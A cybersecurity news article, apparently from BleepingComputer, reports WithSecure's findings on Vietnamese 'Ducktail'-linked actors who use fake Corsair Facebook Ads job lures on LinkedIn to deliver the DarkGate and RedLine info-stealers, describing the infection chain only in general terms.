A threat actor is using fake LinkedIn posts and direct messages about a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading info-stealing malware like DarkGate and RedLine. Cybersecurity company WithSecure detected the activity and tracked the activity of the group, showing in a report today that it is linked to Vietnamese cybercriminal groups responsible for the 'Ducktail' campaigns first spotted last year. These campaigns aim to steal valuable Facebook business accounts that can be used for malvertising or sold to other cybercriminals. DarkGate was first spotted in 2017 but its deployment remained limited until June 2023, when its author decided to sell access to the malware to a larger audience. Recent examples of DarkGate's use include phishing attacks through Microsoft Teams that push the payload and leveraging compromised Skype accounts to send VBS scripts to trigger an infection chain leading to the malware. The Vietnamese threat actors targeted mainly users in the U.S., the U.K., and India, who hold social media management positions and are likely to have access to Facebook business accounts. WithSecure researchers analyzed the metadata for the above files and found leads to RedLine stealer distribution. The downloaded archive contains a VBS script, possibly embedded in the DOCX file, that copies and renames 'curl. Exe' to a new location and leverages it to download 'autoit3. The executable launches the script, and the latter de-obfuscates itself and constructs DarkGate using strings present in the script. Thirty seconds after installation, the malware attempts to uninstall security products from the compromised system, indicating the existence of an automated process. LinkedIn introduced features to fight abuse in the platform late last year that can help users determine if an account is suspicious or fake. It falls on the users to check the verified info before engaging in communication with a new account. WithSecure has released a list of indicators of compromise that could help organizations defend against activity from this threat actor. The details include IP addresses, domains used, URLs, file metadata, and names of archives. DarkGate malware spreads through compromised Skype accounts. Bing Chat responses infiltrated by ads pushing malware. Microsoft Teams phishing attack pushes DarkGate malware. Facebook Messenger phishing wave targets 100K business accounts per week. Fake KeePass site uses Google Ads and Punycode to push malware.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 30 Nov 2023 23:19:27 +0000